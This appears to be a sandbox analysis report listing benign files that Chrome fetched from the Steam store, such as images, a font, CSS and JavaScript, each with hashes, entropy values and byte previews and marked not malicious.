        Preview:../* Recommended creators widget */.. .recommended_creators_ctn .home_smallcaps a.home_smallcap .recommended_creators_container img {... width: 32px;... height: 32px;.. }.....recommended_creators_ctn .home_smallcaps a.home_smallcap {...float: none;...display: inline-block;...white-space: normal;./* override the nowrap we set above */..}.....recommended_creators_ctn:not( .home_ctn ) {... margin: 20px auto 25px auto;.. }.....recommended_creators_ctn .store_capsule {...width: 228px;...background-image: url( '/public/images/v6/home/background_spotlight.jpg' );..}.....recommended_creators_ctn .store_capsule .capsule_header {...height: 107px;..}.....recommended_creators_ctn .store_capsule:not(:last-child) {...margin-right: 9px; /* 9 * 2 + 3 * 200 = 618 */..}.....recommended_creators_ctn .store_capsule .discount_block {...min-height: 18px;.. justify-content: flex-end;..}.....recommended_creators_ctn .carousel_container .arrow {...top: 65px;..}...recommended_creators_ctn .carousel_container
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):53903
        Entropy (8bit):7.977862972312359
        Encrypted:false
        SSDEEP:1536:BSgZgrJ4ZBa1wsS5lLVRN3onB9R1NqDaJAHWbBrRAeWxB:B3qrJ4GU5nRN3ojRbLAKAjT
        MD5:D31ABE8CE61F7D55567943E732E0B61D
        SHA1:8451C2C87987802B9A83E8B893551DB73BEB3152
        SHA-256:E0670CAC6ADDA0CE2B5A05695FCD161267F2881075C8A8A6F3898F4D7105C903
        SHA-512:9BF2878235069FC9A451E97AC870E424A9C41EC29515AD1A176D48D692B016C2221228184B488B438CEF688DA302CC77A12D27810FF1D5E734413EF4633DB7EB
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/730/ss_0f8cf82d019c614760fd20801f2bb4001da7ea77.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................Q.........................!.1.AQ."aq..2....#BR...3.4br..$C..%56Scst....&7...u...................................-......................!.1.A.Q"2.a.q#3B..R..............?..B.._i.w..|.........k..g.rR..M.Z.q.qb.<H.2.%X.^...L^..i.....R.|..$..x..6...h.hq|...G.....E.....s.F;w<..Z.L.Ohqh.r....v...\.t.R...........!<6..<.;..+.D....m..!".V;....+S.0.......`k]Fi.....>jJB-...r"H..s..74.....F....#.~u%..M.....2...C$...L..\.`}..).f$u...!.I........Vm49t.....b.&..prO??Z....../B.^..o..{#G:...9...(8..E.qO..c.u$.{....[.!...W.......y.........;7.iTm....9...Bh.b...N..P.,..(.x..'.~5-.....Y...`.....w+.Bg.%.h........VBDW...Tax.l....$..s..*..uc.;....hB.o.PTl..EP....=e..@...Z..t.H,...=....f....7.......+.../o..........B.N......nL..>.S..L...i.x.G...,....d..D.g6...J.Q-.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 92 x 26, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):2843
        Entropy (8bit):6.967423493204583
        Encrypted:false
        SSDEEP:48:o2/61MYLNnwknA9WpitbEsg9wlO/cHJ3z3VHi3bEs/Hc5mmDhhIZwldFWbd/9maH:/SyYRwknmWpiVbgx/mHqb/Hc5thdlubX
        MD5:41E851F8E42B6BF3414278871E93E8A2
        SHA1:A3811C7E1157F77950EC1F0558293BC90E432E82
        SHA-256:399F74C4E69EAC8B59B149293F9A573955FEF0A62B242CFA70346070013E0966
        SHA-512:F3C3549F1390B52791196E6F19584CBD4C4DB2B51FEF78C9C607C944079FED69B75E8F88594C3D647F2DDC29F282BF41BE455BE328AB27C091B4A37C41B00965
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/logo_steam_footer.png
        Preview:.PNG........IHDR...\.........:.;)....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp:CreateDate="2019-08-09T13:37:29-07:00" xmp:ModifyDate="2020-06-17T17:39:04-07:00" xmp:MetadataDate="2020-06-17T17:39:04-07:00" xmpMM:InstanceID="xmp.iid:a6176093-d0df-1f4a-86f8-26e70acca1dd" xmpMM:DocumentID="adobe:docid:photoshop:5cf069c4-c89c-fa4c-8c00-dff9f3add583" xmpMM:OriginalDocumentID="x
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):3141
        Entropy (8bit):7.824996543416103
        Encrypted:false
        SSDEEP:48:v6N3Z8SM3b0q/q6/JzlfRO1E6LsGSNrs2zcGWcjcYrEScc6iALQAu6W5ZV/8I:v8J154v/Jzy1E4sctTQz35ZV/J
        MD5:89A6875B9730A101C689EB140273E189
        SHA1:3ADE5018846736EFF83DB18937FC7852AE387F5A
        SHA-256:ECEADF3706603C124B2F510DB12813B17879C3E75A4C6E16A0F4A9536A9A5960
        SHA-512:95DA7C0213573140082874E32DC5F4614670ECF11FC03B29BD7868C371FC219678B1B65983FFB44D34BD5A22D5D8871065B98353D7EC7B17B4A17AC003026FCA
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_7abf35c268cc72fbe3f704858ab1720f3727e1b3.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................B.........................!.1..A."2Qa..q.Br...#3457bsu..6CGRtv.................................%.....................!1...2AQa.q"B.............?....1...F.Pe.....K.....K....N<..q.I..e.(T..g..........1.G..a&.S..`JSE..Q.I$.*.I?C._f....z...~.*.{..)..Cs...G+...^Lu!.r...%,.UV....qEQ7.b..}.GPT.I/Y...T..#..1.N..(/l.e.m.d;.iY...m.u..E.t.Q.$.#....aq.....y.qt.|.R....Ab[.<.../.ln..........F.......RQ.N...N..H...cG.}...t..b......g^wm\t..uMmT..CO.w..$......z.aK4..l....*...onm.-sY$..-...RC,fU.B.GN9<.>V..R.KiZ6v..T~...6.ZZkD..Y<. .F..8.r:A.....'Z.F).8..5.:....7...c.FH...~.<q..^.....Kh.}..S.....#x......;r;.D.e./.5[...+.E.%M...Z.oZ.L...@ rX.2...F29.*X)F..'.].Q..B....O.....B...l....`G.~Z........T .=. *2t.08..i.z..I.......41#...>.x'...~..n..x...O.^@.-.......M.K..}.6Ue..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 2000 x 800, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):161187
        Entropy (8bit):7.990584731304817
        Encrypted:true
        SSDEEP:3072:bZ9L5Lw6SelSTdibeeotIIwQTHchAMXBDjLjtFzVEJJU:bZ99w6SelSsDomIMxD3jFEfU
        MD5:1D7363064D454B57F9C84DF28F566CE7
        SHA1:773B8A0F0C6CBDA10B0C2BA62FB53D323946E311
        SHA-256:F2F4D59A808653E110B074AB0DC600B249E7451CC609EEEFF3EFDA1E32CCF7D8
        SHA-512:F8A9E4C39D6C3E12AD9D01DB9C0318FCB82B5DBE97B57CA6576A482CE157F456786752825E397122EA45FBCE77E6C3CF62A2671C1973E40DCBF3CF26852CD49C
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR....... ......n$....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:4F55FCD074F3E4119506ED59260C4062" xmpMM:DocumentID="xmp.did:17B3CA22F37811E492C4CBECAFB1AE21" xmpMM:InstanceID="xmp.iid:17B3CA21F37811E492C4CBECAFB1AE21" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F44166A275F3E411A027CF77346B534E" stRef:documentID="xmp.did:4F55FCD074F3E4119506ED59260C4062"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>B....q.IDATx......(O...........W.I$@.$.(2..^...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (65256), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):187252
        Entropy (8bit):5.053979726725543
        Encrypted:false
        SSDEEP:1536:zyAA36oGqNyyrdiEEUl2SoZsJcl1jnXvQErjituf3FwJzr6oQfVxlSgLOd8vlx+:zJCdizMm1rQErjMuf3FwJzr6oQzEgLH+
        MD5:A6BEDFA73BF233254EF1F7E86FF05CCC
        SHA1:E92927E134B3991855B11CF3C984E3511B2711A1
        SHA-256:2B63497F91270119ADD80D321FD76EBDCEDDAE6C5C035470C9D06B932C888E89
        SHA-512:5CD30262D78EE6C16680C23F4EAB0B1D534E71CC01019DDB71E41262F30B1439A7BCF4D13D0BE51AC79DBA0591FBF7DA2F9EFEE92B61570A842B219C6576C8A4
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/shared_english-json.js?contenthash=638527edc959a2c11248
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[7975],{44965:e=>{e.exports=JSON.parse('{"language":"english","Steam_Platform":"Steam","Button_About":"About","Button_Append":"Append","Button_Back":"Back","Button_Cancel":"Cancel","Button_Close":"Close","Button_Clone":"Clone","Button_Confirm":"Confirm","Button_Copy":"Copy","Button_Copied":"Copied","Button_CopyClipboard":"Copy to Clipboard","Button_CopyLink":"Copy Link","Button_Continue":"Continue","Button_Create":"Create","Button_Delete":"Delete","Button_Discuss":"Discuss","Button_Dismiss":"Dismiss","Button_Edit":"Edit","Button_Learn":"Learn more here","Button_Publish":"Publish","Button_Post":"Post","Button_OK":"OK","Button_Done":"Done","Button_Overwrite":"Overwrite","Button_Retry":"Retry","Button_Remove":"Remove","Button_Revert":"Revert","Button_Save":
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 52 x 32, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1280
        Entropy (8bit):6.717734822303927
        Encrypted:false
        SSDEEP:24:Iy1he91Wwjx82lY2T3ouVjF4/FayJ3V71FBZFfGe0pga/IA6PbNU2iRb9S:IwqQNn2xXshJ3BTZfCga16JH49S
        MD5:915ACBF45A60ECFFABC2730C35384818
        SHA1:DB2F755F7132BE456649A782C4E5BDCC88868C28
        SHA-256:7EC991D9353805F71AE4293FB299D00E579D2C59BD74E641B587D24B841A5DA6
        SHA-512:234777259FB16A8DDFAAAB3F4488633FB6001BCA918E8E58A34F89F8A267EA8FF5AC4DCF65E0BEEA9AB1C78AF42F6728A7C00CFB6BD8F038970BB030AC55F95D
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...4... .....]?[f....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:FE658773E2BB11E3ADB7D7D9895ED7D0" xmpMM:DocumentID="xmp.did:FE658774E2BB11E3ADB7D7D9895ED7D0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FE658771E2BB11E3ADB7D7D9895ED7D0" stRef:documentID="xmp.did:FE658772E2BB11E3ADB7D7D9895ED7D0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..H#...tIDATx.b...?.p..........'.'.....B..... ^.....G .........$.K...arb(....13.u.....k.6.T....... ...3Hb.8....C..b&.J
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 616x353, components 3
        Category:dropped
        Size (bytes):68283
        Entropy (8bit):7.9777923198308685
        Encrypted:false
        SSDEEP:1536:9ECobgF+SGcVf+xmkS7bG3oxpJRvviKcMOlC0+9hPa:9kgFyo+xmkSm3wRv6zs0GPa
        MD5:1C8307CA820E4BDCF6AF02340FA799FE
        SHA1:545B3ABACE45A46807A3EF91853D1EBA12E3E867
        SHA-256:C8209608DBAA74AFEFC76C9BC7F8EB1A15FB3B7FF87DD0C1B631E1F336AEE853
        SHA-512:6EE9AF4C62DD2AB72F028D20128B421B251BDE9AA6EB7458482DB21E812C94F955D062C83AB0E026999D5BC8C492F2DE5CF936DC52AE237C1D571E76A1020347
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................a.h.............................................N.........................!.1A.."Qa..2q..B....#3...Rr...$4Cb..%..&Ss....5cdu.................................:.....................!.1..A."2Qa....#q.3Bb...R.....CSr.............?..QT4ePH....ql.5.Y...c..8[...!}E..#s......Xy7LKdH(.$;3...7.l-....@X.Z......4...kyj<.p.1$r.j6.o.l.)#........b..iV..s.;b[....a.Pq.4..f.M..P..@Rw.~X[(.w*F.Tr..:.d..".KnmbM..H0.u6...QIR..C...........~...-.A..#i.g.d+.uq..{..al..N.vs.<-...o.. .....(b.)6....>&*m......i.&.f.}._........!.....-..,..(f.....3.*Cj&..;.,....u......f...#....T.6.3.A#....P./t........S].!#k. .nd.l......X....cs.b.),..K...Kbd...nZ..[./....F.n.....hV.*U7...=..-..L..:Tu..x[...$N.uoab..D...;..`v8...RJZ.7......E.r...o..b....,.A...C.l..G.YY.....YF,..].a....d....@$1..<,P.b,K..o....Z.X.`.<..<..R..)...V...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):37275
        Entropy (8bit):7.980118744288342
        Encrypted:false
        SSDEEP:768:Q1XiwSXD4QpyHQQbOld6o8aHO2a4UoXmt000yJnTQ:EXizvE636zv7ou0fyJ8
        MD5:5DF1846F35506EA230009C57772749AD
        SHA1:73DF5A4DE1F1965CDE8B233BC40EA4D601FCD0B6
        SHA-256:E85E5B07A83662F2A030837D7459A3937B1256459E2325F932DECE12A322227E
        SHA-512:23A76B339CEC5DCBAE86321310B06B68B943F04FF929834E5CB3190B4A8450EF5D0FA81B40810C03E178F477989318C6DE2F9B70A6EEDCC10F72845349C1724A
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C......................................................................................................................G..........................!.1."AQ..aq2....#B..$R...3b...4r....5CS.cs..................................;........................!1A"Q..a.2q........#B...3RCbr..$S............?..u.a..e..B.k..%...G3..N....H.m...0,d....$n;...5.ai|Q.I.....!,.Sg2.v.T.X.F...Y.z...).......V.........@.{r-l..#)2gBx...`.......@...+..F.....\....&.o(...=..=.d.#..=;.+.(-....]...{....;.Q.5.T....|..f.....O<.....E......tu&..L).Kv....8...>..z..&......3.@ll0y+c.#e....HK..h. .`.0.]Q#).........`~...F8..N7X.!B..UG......2..wPmka...Uky......J......@.`-.5.....i.......\...{..!.%Tpp...rt<c.Z.......6t1..;L...v&G.........su.......{..8.A..[....:..~.l....3........4.....+)..P+..........pt...AU[..n..nm.|r2d.....~/.9.2.......t.#.2...9.2.k.P.>.0.zX..i...P.....J.%.N..L{.....j.^8R.F..m..m~.6......s%........2.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 15 x 13, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):291
        Entropy (8bit):6.7719789082293165
        Encrypted:false
        SSDEEP:6:6v/lhPU8WnDspP8GYUQiOTmUDJcyYWm5kvrCBVreLbp:6v/78OaGYfLDBYCrCneL1
        MD5:A2796187C58C7E948159E37D6990ECC2
        SHA1:4209CD85ADD507247F9CE5A87A8C9095B54EE417
        SHA-256:23341256DB7F44B1F3811880FA2BAE6B7748BBF6B62C544A162E38CF0D5C5082
        SHA-512:5EF103B8398507495C2708DF8FCD82BDB763B1D580AAAA6CACFB805614764277C19E8ECE5D890A8AAFC004FC8C25E3AB2E67D6FBF373C432A9A0D7C36FA0890F
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/images/header/btn_header_installsteam_download.png?v=1
        Preview:.PNG........IHDR.............v.4A....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.......9....]@.......O.G..@...?..:!..H.....T...{.i>..Y.M...ff..W..'.._P>..!..j.......&......4.'...X.@......?.5..m7..E..X.....Eh. ...P...Q ........... ...%.......y...c..@..?i...{.....HteDtom....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JSON data
        Category:downloaded
        Size (bytes):29
        Entropy (8bit):4.1162646156680225
        Encrypted:false
        SSDEEP:3:YHr0I1W/Aw:Y4I1W/Aw
        MD5:7D8E35AFA8792B923F4E6C5906E7C4B5
        SHA1:32168FBCD8A98B424F566046D3680648B49AC633
        SHA-256:D5C8F5FB29CA010EC4C6E11774D17B0CC27B21304811521E29141F581C061E87
        SHA-512:6C77E16CC85801E0D6732876B7A1B59F48CD19FE5FFBCF081C6EC96D496BE48421A92A4C0258AED151B922515B48553069B7188107B62AD0AB80B421B8D7CBB3
        Malicious:false
        Reputation:low
        URL:https://store.steampowered.com/dynamicstore/saledata/?cc=US
        Preview:{"bAllowAppImpressions":true}
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 244 x 212, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):3777
        Entropy (8bit):7.855078020337897
        Encrypted:false
        SSDEEP:96:W5Zsk8bb6l5qnCoghGfkm37QP00rqGDXrg/sG3vUx+Iocg2fkjGfkjky:W5H8o5qe0Mu7600WiXE/v3ve+Is2MjGm
        MD5:EABC76EB57FEAE44ADD7FAEAD028521E
        SHA1:4E3E53938FAD15661D2D046A868338841A95DB19
        SHA-256:FC9E6260A2706AE146282D77E67BC1B74688435F8912AB4C1932641EEC28BFFA
        SHA-512:5C6DA6EEEFDDF321C2BC7E39A134E0A3140A9F93AD1560B2E102EF60EC218C29AAE14ED344C79E25CC5493CD15551040D8C909DE28DCAB02034D787563104E07
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...cIDATx..._LTg...w.i........Vmk.6X....i..F..{...^..^4Mz..6ml..nb ]....e.a....v..)...a.E.).#..>.0.3g.Kww8/..'y.g........sf.....W.2.... ...4....@......@...h... ...4....@. ....@...h... ...4....@. ....@...h......2....P^^...sVEE....r..={f.K....I...F#R...g..vN..k...%.Oj..6...h.:"...0......K.E..G..."..@.x..w.*...'."_..A...L.r....I..W........^H...Q...:;..h4j.z..8..,..a/...w.Fm.Meg.C.a.|..w.....u.`.zM.U.=....4e...=.U.....[.h.z..j...Te.a..z...+RUR.8.N.u.INN..o?a........E...o}.#...._....Oc..=.Orr.&.!;;[=..3..q.....?H...0{.S._m.B..(.6.Rm.)...]..%....3..c..Dk.M..z.%.c..NTd...}..90..tj.v.#.L..M.t.uc.<>..3..;..:..G..9..I.....%.@.`..d....@...h.@. ...4`6...M.@'.n......I/z`5>>.K...X7Z.Z.....5.7..h+.N.h....gS...8...........@..Njj.}....'...{`...'T{....mmm'.t2....?V..=C.......=b......`|s.@'zC.N......."..>k...M......)...}....?.r...+z.x....JTII.....4.O_....s..?>W..?.O.....`...t{...r..Z
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):3270
        Entropy (8bit):7.8300216097053745
        Encrypted:false
        SSDEEP:96:vhy1EClsxDnKk6Fe+6ZcAfHoqT/1s8roA:pyaWejTfIe10A
        MD5:63B8E7983C188E324D2F917FA76B95FA
        SHA1:D54F51C0C4E488BAC2C1ABB622A8CB2E2ED3033C
        SHA-256:1860CE787983F7607EF624DE6D950A768BB0740D576385ED6E605B54CAA425A1
        SHA-512:A8021BD5F08DBD25F621CACB2CE2B0585F7F88D6CA17794E3F812D6E249972930E6B28C5D0A745399CFF1AEB7AFB8A9CD8A046F9F8752195C069171C6EB32E07
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................>.........................!.1..Q."Aaq.23..r.....#$4BRb..CDS................................&......................!.1AQa.."q.2..............?..r..G zjvt4.a.9'DK..:...".l....~...,JE..S...$~xfE...c$g8.88t]dS6..>^z*...A..U.3(....$..P..X.2.A.8<.O.f.i.......V...,T=E.wZ*.;.Tt(..%..|..G...t..=.F.VH.O..eB..=..}sn...m&.."T.2D.Tm!'...i.....uA.!.....<..N..\.P.2]..........Q.k.....Us..N.v..DSh.x../F.UOh...|=Gr...0...T4e..........u.2o.N\.I.$..b...&Nr.<..v.KC.h..DqL.py.fI.p.$\.;.....[....i...#4.1.`....?.....6.@.i.$.......)P...4.A..L.c.}=.ZD...m.gG.7..u..G.7.....9...E.x..=........t4.X.~...M..=...\....c=.<.'..Zj.&....U.O..E...I.n.M.5."Vx....1.T..-.'.'H.oD..l..OO..U@M?JQ..Rd.C ....."I;....u.-.rL.G.x..h.f..,.;....S[...u..7M!......c{.p.:4k5..~....K.N-..m.Mm"2.)......g....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 22 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansBold4.015;Plau;MotivaSan
        Category:downloaded
        Size (bytes):123884
        Entropy (8bit):6.07029634687136
        Encrypted:false
        SSDEEP:1536:M+s43BGZsrolB21EJ4q+GIbdSW7VvCtQXjPM3mz1yxvjWRVIoFMe1V13836GKCnY:T1GZXlB2SUbxVv/zM3mZyxLUZGrSDfj9
        MD5:6168553BEF8C73BA623D6FE16B25E3E9
        SHA1:4A31273B6F37F1F39B855EDD0B764EC1B7B051E0
        SHA-256:D5692B785E18340807D75F1A969595BC8B1C408FB6FD63947775705E6D6BAA66
        SHA-512:0246CEE85A88068CA348694D38E63D46C753B03AFADF8BE76ECA18D21E3DE77B495215ED2384D62658A391104F9E00DF8605EDB77339366DF332C75691928EFB
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/fonts/MotivaSans-Bold.ttf?v=4.015
        Preview:........... DSIG............GDEF...4...,...@GPOSD.`>...l..u.GSUB.d....wT....OS/2vb.........`cmap.d.....X....cvt Hg.....,....fpgm.6!.........gasp.......$....glyf..........Xhead...a...@...6hhea.......x...$hmtx.NL.........loca{.:.........maxp.......,... name.s.U...L...Kpost............prep...........................................s...t.u...v......./......... .Q...........D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J..................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 19 x 12, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):161
        Entropy (8bit):5.889732387119839
        Encrypted:false
        SSDEEP:3:yionv//thPlmztjllRl/HRthwkBDsTBZtmmAQGzlkWX0N/khY1RtjhCq/4cL+/XN:6v/lhPoJnDsp1AQIlBE91RtjhCE4cK/9
        MD5:F2DAE37ACAC6B9D5A91CAF1885C2F7D0
        SHA1:5F80FDDE9F702A1D7589BC5FAF88C14066E26C32
        SHA-256:93B1FBE4F6245B62BFD4C8C3347ABE0FE67ED711315E59BFADAEBC9873D8D9B5
        SHA-512:8D7FF7133AB97D81985C50FA8FD93916B42B1CE812AF21BC732DCAE45D59B9154FCC965857235D925C471DB191DFB79C0753C70C7A4D5B0285B908E396216805
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...CIDATx.b...?.....6....@.........6.h..1..A....@....fH.^.g.HO.......#.7.d.].....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):16055
        Entropy (8bit):2.020046011794595
        Encrypted:false
        SSDEEP:96:VSuTskEWRpxNXrNGQmfGGOdsc5TvEKXgj/:VSXktL5Zq/
        MD5:EEBC181FB6CC5A98FB239B0C39305F2C
        SHA1:856BBA36A81C569FBE7FA5DFD058145C202B66B1
        SHA-256:2EE2F0D807BD71B9E5F9EEE9BC98C1BE1D94195D766C183C7B057B9CCF202A77
        SHA-512:A660E0FA472E3EF6D914D9CA1221FDD968FA666379E7496011110DC9598CBEEBCC6720B61F0F6A7BA4786F73A84B8439530845C43CFAF9242F62FCE4CB46CD11
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................pHYs...............<.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2016-02-16T16:27:44-08:00</xmp:CreateDate>. <xmp:ModifyDate>2016-03-30T16:41:18-07:00</xmp:ModifyDate>. <xmp:M
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):245242
        Entropy (8bit):7.982960649041616
        Encrypted:false
        SSDEEP:6144:SZWU5qPvYrXba8ORawA14ckMCGmibb4fNrIJi4/e:crGIwc4MCGmibbg4/e
        MD5:ACD3E5AE0E72A18E7729C73236980966
        SHA1:08B7E44D329F59FD60C72301EF56A160055E42AC
        SHA-256:DF7D33B73DDCB48066B7CD4CD8299E73E18062BD7554F901E51122CEB735943F
        SHA-512:8ACCC948DDD8CBFAD372013882DA6E728C193C9B2A7E022A1EDD48CE68619DF3781F68CCBB814435BFCB53159F862935EF7CA2B5A32420D345A50367C9D8CD36
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/cnet.png?t=1705420866
